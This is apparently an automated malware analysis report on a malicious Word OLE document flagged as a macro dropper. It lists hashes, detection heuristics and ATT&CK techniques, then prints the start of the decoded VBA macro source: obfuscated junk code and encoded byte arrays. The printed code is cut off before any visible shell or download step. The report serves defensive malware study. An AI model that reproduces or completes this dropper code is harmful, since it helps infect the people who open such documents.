Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8a79a4997e9cf158…

MALICIOUS

Office (OLE)

Size: 305.5 KB
Created: 2015-12-16 14:32:00
Authoring application: Microsoft Office Word
First seen: 2017-11-29
MD5: 5d417fe1dbd2ee915ac8bdc8baa1b826
SHA-1: 09665782cdec82eb03ff6dc62a671a372b50561e
SHA-256: 8a79a4997e9cf1582c08c2555a560b7cabe0611022c193154539cbffe9513465
Risk score: 222

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The 'Document_Open' macro triggers a 'Shell()' call, which is a critical heuristic indicating execution of arbitrary commands. ClamAV detection as 'Doc.Dropper.Agent-6379868-0' further confirms its malicious nature as a dropper. The VBA code is heavily obfuscated, but the presence of the Shell() call strongly suggests it's designed to download and execute a secondary payload.

Heuristics (6)

  • ClamAV: Doc.Dropper.Agent-6379868-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6379868-0
  • VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    Shell() call in VBA
  • Document_Open macro (high, OLE_VBA_DOCOPEN)
    Document_Open macro
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
    • http://purl.org/dc/elements/1.1/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
    • http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
    • http://www.iec.ch (in document text, OLE body)
    • http://ns.adobe.com/tiff/1.0/ (in document text, OLE body)
    • http://ns.adobe.com/exif/1.0/ (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 45572 bytes
SHA-256: 074da90464abf51c23f7ff945226c40fabe923d1c28997bed084c25f4620b532
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If VBA7 Then
Private Declare PtrSafe Function KLdP5FaGebJdf Lib "WAfnY2e" Alias "T7CYs9JpQeKYa" (ByVal QuhNED016lne As String, OJkjkgzBzN As Long) As Long
#Else
Private Declare Function KLdP5FaGebJdf lib "WAfnY2e" Alias "T7CYs9JpQeKYa"(byval QuhNED016lne as String, OJkjkgzBzN as Long ) as Long
#End If
Dim EFnMW9uqqwMh As String, A4cmLA5fea As Integer
Dim A4cmLA5fea1() As Variant, A4cmLA5fea2() As Variant, A4cmLA5fea3() As Variant, A4cmLA5fea4() As Variant, A4cmLA5fea5() As Variant, A4cmLA5fea6() As Variant, A4cmLA5fea7() As Variant, A4cmLA5fea8() As Variant, A4cmLA5fea9() As Variant, A4cmLA5fea10() As Variant
Dim A4cmLA5fea11() As Variant, A4cmLA5fea12() As Variant, A4cmLA5fea13() As Variant, A4cmLA5fea14() As Variant, A4cmLA5fea15() As Variant, A4cmLA5fea16() As Variant, A4cmLA5fea17() As Variant, A4cmLA5fea18() As Variant, A4cmLA5fea19() As Variant, A4cmLA5fea20() As Variant
Dim A4cmLA5fea21() As Variant, A4cmLA5fea22() As Variant, A4cmLA5fea23() As Variant, A4cmLA5fea24() As Variant, A4cmLA5fea25() As Variant, A4cmLA5fea26() As Variant, A4cmLA5fea27() As Variant, A4cmLA5fea28() As Variant, A4cmLA5fea29() As Variant, A4cmLA5fea30() As Variant, A4cmLA5fea31() As Variant, A4cmLA5fea32() As Variant, A4cmLA5fea33() As Variant, A4cmLA5fea34() As Variant, A4cmLA5fea35() As Variant, A4cmLA5fea36() As Variant
Sub LHJwPn()
NrSyi8bt999vkR = 71
If Abs(6) = 57 Then OzAJDIA = 7498
Load QHW95ygCCXLKMlehi
DateSerial 52, 90, 50
DeleteSetting "Qp4Y8D4vz89Olb"
Randomize
DyCTQ9UKs03HGVdP = EOF(96)
If IsMissing(31) = True Then XwRmTkWR84BfUqAHC = 80
DWcjwawOjsm = CVErr(31)
Hour 53
AppActivate 41
HDM9913zDtS = 60
End Sub
Function zKK(U6jMo As Integer) As Boolean
PdKLCGN = 61
Static HFBwwFtzVi0lGw38q As Byte
G7UUZ5FN3z = 78
HFBwwFtzVi0lGw38q = HFBwwFtzVi0lGw38q + 1
OuWaqUF1z = 48
If HFBwwFtzVi0lGw38q = 1 Then Debug.Assert Not zKK(59)
AeIBD = 73
zKK = HFBwwFtzVi0lGw38q = 0
Q9dlGz5OfQm = 70
HFBwwFtzVi0lGw38q = 0
QPM3j8cFUa0L = 81
End Function
Sub OJwHPvvkNBx()
WBJkej = 47
On Error Resume Next
B0K8bUdQ = 54
A4cmLA5fea1() = Array(205, 250, 201, 224, 251, 227, 50, 81, 126, 59, 75, 21, 29, 69, 127, 10, 44, 1, 83, 0, 9, 44, 42, 19, 12, 8, 20, 103, 115, 80, 29, 40, 55, 1, 12, 95, 83, 111, 87, 119, 87, 109, 99, 124, 17, 55, 95, 124, 0, 117, 58, 108, 70, 117, 69, 5, 8, 48, 123, 72, 4, 99, 35, 47, 90, 9, 100, 43, 120, 27, 94, 67, 66, 68, 82, 20, 47, 85, 121, 113, 76, 97, 17, 66, 36, 110, 114, 67, 33, 120, 111, 15, 124, 66, 92, 78, 8, 60, 111, 51, 14, 87, 103, 57, 24, 47, 43, 120, 116, 100, 110, 127, 64, 70, 101, 113, 19, 41, 77, 121, 87, 75, 99, 122, 19, 32, 22, 43, 249, 199, 128, 192, 147, 140, 163, 148, 158, 143, 161, 255, 189, 177, 247, 178, 175, 189, 177, 149, 156, 142, 157, 187, 136, 179, 183, 211, 183, 196, 169, 188, 209, 231, 245, 165, 198, 251, 198, 227, 197, 249, 249, 170, 202, 244, 204, 225, 221, 147, 227, 195, 214, 234, 213, 242, 211, 159, 232, 207, 204, 249, 205, 132, 169, 240, 210, 196, 223, 156, 219, 208, 200, 194, 237)
VpGcg5LX = 51
A4cmLA5fea2() = Array(189, 204, 199, 246, 225, 171, 156, 154, 204, 227, 229, 226, 226, 161, 255, 209, 220, 194, 211, 204, 139, 153, 167, 199, 170, 250, 231, 130, 225, 140, 187, 184, 248, 158, 167, 250, 247, 205, 181, 224, 183, 196, 191, 135, 163, 248, 168, 124, 109, 110, 1, 101, 89, 1, 40, 21, 94, 14, 52, 35, 35, 108, 95, 92, 24, 126, 71, 21, 14, 124, 60, 0, 73, 5, 37, 38, 7, 19, 95, 91, 8, 29, 0, 196, 165, 221, 255, 200, 166, 60, 22, 9, 58, 32, 12, 94, 12, 50, 38, 105, 43, 115, 22, 33, 111, 39, 10, 46, 88, 48, 49, 84, 14, 108, 85, 53, 19, 11, 15, 22, 108, 57, 42, 22, 53, 4, 61, 14, 112, 65, 126, 87, 101, 75, 117, 17, 109, 9, 127, 35, 6, 4, 26, 18, 104, 3, 1, 39, 94, 84, 77, 72, 6, 54, 15, 59, 108, 117, 97, 94, 22, 125, 16, 53, 68, 54, 6, 4, 70, 36, 29, 90, 74, 119, 31, 119, 37, 107, 11
... (truncated)